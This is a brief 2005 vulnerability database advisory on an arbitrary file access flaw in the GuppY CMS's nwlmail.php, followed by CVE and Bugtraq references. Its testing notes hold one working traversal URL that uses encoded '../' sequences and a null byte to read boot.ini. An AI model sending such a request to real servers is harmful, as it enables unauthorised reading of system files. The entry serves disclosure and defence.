GuppY nwlmail.php lng Variable Traversal Arbitrary File Access

2005-11-28T04:18:41
ID OSVDB:21170
Type osvdb
Reporter OSVDB
Modified 2005-11-28T04:18:41

Description

Manual Testing Notes

http://[target]/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00

References:

Vendor URL: http://www.freeguppy.org/ Secunia Advisory ID:17790 Related OSVDB ID: 21167 Related OSVDB ID: 21169 Related OSVDB ID: 21166 Related OSVDB ID: 21168 Other Advisory URL: http://rgod.altervista.org/guppy459_xpl.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0324.html ISS X-Force ID: 23319 CVE-2005-3927 Bugtraq ID: 15610